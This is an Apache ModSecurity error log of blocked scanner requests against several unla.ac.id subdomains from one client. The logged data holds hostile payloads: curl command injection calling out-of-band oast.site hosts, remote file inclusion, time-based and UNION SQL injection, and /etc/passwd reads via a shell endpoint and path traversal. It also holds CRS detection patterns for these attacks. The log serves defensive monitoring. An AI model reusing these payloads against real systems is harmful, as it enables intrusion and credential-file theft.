[Tue Aug 29 11:31:04.643991 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgxw4f477and9to.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgxw4f477and9to.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXUAAAAR"]
[Tue Aug 29 11:31:04.664121 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgjuii5t6ph16ap.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgjuii5t6ph16ap.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXYAAAAR"]
[Tue Aug 29 11:31:04.666111 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlga3bfq69i1x5ig.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlga3bfq69i1x5ig.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP9HfMAAAAW"]
[Tue Aug 29 11:31:04.704286 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg97cgmg95ej6pb.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg97cgmg95ej6pb.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP7dXgAAAAR"]
[Tue Aug 29 11:31:04.708546 2023] [:error] [pid 1026] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg6swuzroqhwn1n.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlg6swuzroqhwn1n.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQCvywAAAAk"]
[Tue Aug 29 11:31:04.713721 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlggjsiimqxi9d7i.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlggjsiimqxi9d7i.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAQEGE0AAAAm"]
[Tue Aug 29 11:31:04.727436 2023] [:error] [pid 1025] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgy78cwp7xtycqd.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQBUFYAAAAj"]
[Tue Aug 29 11:31:04.730988 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgaxowxscixfjgt.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQDFQsAAAAl"]
[Tue Aug 29 11:31:04.748296 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgx9sk3qynsrf19.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP7dXoAAAAR"]
[Tue Aug 29 11:31:04.751370 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgtir3kt6yans59.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAQA-6IAAAAi"]
[Tue Aug 29 11:31:04.754784 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlgw45yp8tsw98yu.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP4H@EAAAAI"]
[Tue Aug 29 11:31:05.000212 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAP7dX0AAAAR"]
[Tue Aug 29 11:31:05.000364 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10iMCo-f0AAAP-LMkAAAAe"]
[Tue Aug 29 11:31:05.020165 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP9HfsAAAAW"]
[Tue Aug 29 11:31:05.021060 2023] [:error] [pid 1019] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP7dX4AAAAR"]
[Tue Aug 29 11:31:05.021919 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQEGFIAAAAm"]
[Tue Aug 29 11:31:05.044126 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAP@MvwAAAAZ"]
[Tue Aug 29 11:31:05.722986 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQHAj0AAAAp"]
[Tue Aug 29 11:31:05.739153 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "pusatbahasa.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQLC@gAAAAt"]
[Tue Aug 29 11:31:05.739642 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "informatika.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQOvy8AAAAw"]
[Tue Aug 29 11:31:05.743835 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQSWJMAAAA0"]
[Tue Aug 29 11:31:05.746017 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQR42sAAAAz"]
[Tue Aug 29 11:31:05.919487 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQKOZgAAAAs"]
[Tue Aug 29 11:31:05.963153 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10icCo-f0AAAP@MwMAAAAZ"]
[Tue Aug 29 11:31:06.317673 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAP-LNIAAAAe"]
[Tue Aug 29 11:31:06.330817 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQHAj4AAAAp"]
[Tue Aug 29 11:31:06.334818 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAOE1kcAAAAC"]
[Tue Aug 29 11:31:06.362279 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQKOZoAAAAs"]
